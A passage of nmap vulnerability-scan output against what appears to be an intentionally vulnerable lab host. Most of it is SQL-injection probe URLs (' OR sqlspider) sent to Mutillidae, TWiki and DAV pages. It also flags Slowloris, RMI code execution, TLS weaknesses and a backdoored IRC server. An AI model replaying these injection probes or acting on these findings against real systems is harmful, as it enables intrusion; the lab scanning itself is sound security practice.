    |   /test/: Test page
    |   /phpinfo.php: Possible information file
    |   /phpMyAdmin/: phpMyAdmin
    |   /doc/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
    |   /html/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
    |   /icons/: Potentially interesting folder w/ directory listing
    |_  /index/: Potentially interesting folder
    | http-fileupload-exploiter: 
    |   
    |_    Couldn't find a file-type field.
    | http-slowloris-check: 
    |   VULNERABLE:
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |       
    |     Disclosure date: 2009-09-17
    |     References:
    |       http://ha.ckers.org/slowloris/
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    | http-sql-injection: 
    |   Possible sqli for queries:
    |     http://192.168.43.120:80/dav/?C=N%3bO%3dD%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=usage-instructions.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=notes.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=php-errors.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
    |     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?do=toggle-hints%27%20OR%20sqlspider&page=home.php
    |     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?do=toggle-security%27%20OR%20sqlspider&page=home.php
    |     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9%27%20OR%20sqlspider&rev1=1.10
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9&rev1=1.10%27%20OR%20sqlspider
    |     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev%27%20OR%20sqlspider&param1=1.10
    |     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev&param1=1.10%27%20OR%20sqlspider
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8%27%20OR%20sqlspider&rev1=1.9
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8&rev1=1.9%27%20OR%20sqlspider
    |     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.7%27%20OR%20sqlspider
    |     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.8%27%20OR%20sqlspider
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7%27%20OR%20sqlspider&rev1=1.8
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7&rev1=1.8%27%20OR%20sqlspider
    |     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.9%27%20OR%20sqlspider
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7%27%20OR%20sqlspider&rev1=1.8
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7&rev1=1.8%27%20OR%20sqlspider
    |     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.7%27%20OR%20sqlspider
    |     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.9%27%20OR%20sqlspider
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8%27%20OR%20sqlspider&rev1=1.9
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8&rev1=1.9%27%20OR%20sqlspider
    |     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.8%27%20OR%20sqlspider
    |     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev%27%20OR%20sqlspider&param1=1.10
    |     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev&param1=1.10%27%20OR%20sqlspider
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9%27%20OR%20sqlspider&rev1=1.10
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9&rev1=1.10%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=M%3bO%3dD%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=S%3bO%3dD%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=D%3bO%3dD%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
    |     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
    |     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
    |     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?do=toggle-hints%27%20OR%20sqlspider&page=pen-test-tool-lookup.php
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?do=toggle-security%27%20OR%20sqlspider&page=pen-test-tool-lookup.php
    |     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
    |     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
    |     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
    |   Possible sqli for forms:
    |     Form at path: /mutillidae/index.php, form's action: index.php. Fields that might be vulnerable:
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |_      initials
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    |_http-trace: TRACE is enabled
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    111/tcp  open  rpcbind
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds
    512/tcp  open  exec
    513/tcp  open  login
    514/tcp  open  shell
    1099/tcp open  rmiregistry
    | rmi-vuln-classloader: 
    |   VULNERABLE:
    |   RMI registry default configuration remote code execution vulnerability
    |     State: VULNERABLE
    |       Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
    |       
    |     References:
    |_      https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb
    1524/tcp open  ingreslock
    2049/tcp open  nfs
    2121/tcp open  ccproxy-ftp
    3306/tcp open  mysql
    |_ssl-ccs-injection: No reply from server (TIMEOUT)
    |_sslv2-drown: 
    5432/tcp open  postgresql
    | ssl-ccs-injection: 
    |   VULNERABLE:
    |   SSL/TLS MITM vulnerability (CCS Injection)
    |     State: VULNERABLE
    |     Risk factor: High
    |       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
    |       does not properly restrict processing of ChangeCipherSpec messages,
    |       which allows man-in-the-middle attackers to trigger use of a zero
    |       length master key in certain OpenSSL-to-OpenSSL communications, and
    |       consequently hijack sessions or obtain sensitive information, via
    |       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
    |           
    |     References:
    |       http://www.openssl.org/news/secadv_20140605.txt
    |       http://www.cvedetails.com/cve/2014-0224
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
    | ssl-dh-params: 
    |   VULNERABLE:
    |   Diffie-Hellman Key Exchange Insufficient Group Strength
    |     State: VULNERABLE
    |       Transport Layer Security (TLS) services that use Diffie-Hellman groups
    |       of insufficient strength, especially those using one of a few commonly
    |       shared groups, may be susceptible to passive eavesdropping attacks.
    |     Check results:
    |       WEAK DH GROUP 1
    |             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
    |             Modulus Type: Safe prime
    |             Modulus Source: Unknown/Custom-generated
    |             Modulus Length: 1024
    |             Generator Length: 8
    |             Public Key Length: 1024
    |     References:
    |_      https://weakdh.org
    | ssl-poodle: 
    |   VULNERABLE:
    |   SSL POODLE information leak
    |     State: VULNERABLE
    |     IDs:  BID:70574  CVE:CVE-2014-3566
    |           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
    |           products, uses nondeterministic CBC padding, which makes it easier
    |           for man-in-the-middle attackers to obtain cleartext data via a
    |           padding-oracle attack, aka the "POODLE" issue.
    |     Disclosure date: 2014-10-14
    |     Check results:
    |       TLS_RSA_WITH_AES_128_CBC_SHA
    |     References:
    |       https://www.securityfocus.com/bid/70574
    |       https://www.openssl.org/~bodo/ssl-poodle.pdf
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
    |_      https://www.imperialviolet.org/2014/10/14/poodle.html
    |_sslv2-drown: 
    5900/tcp open  vnc
    |_sslv2-drown: 
    6000/tcp open  X11
    6667/tcp open  irc
    |_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
    8009/tcp open  ajp13
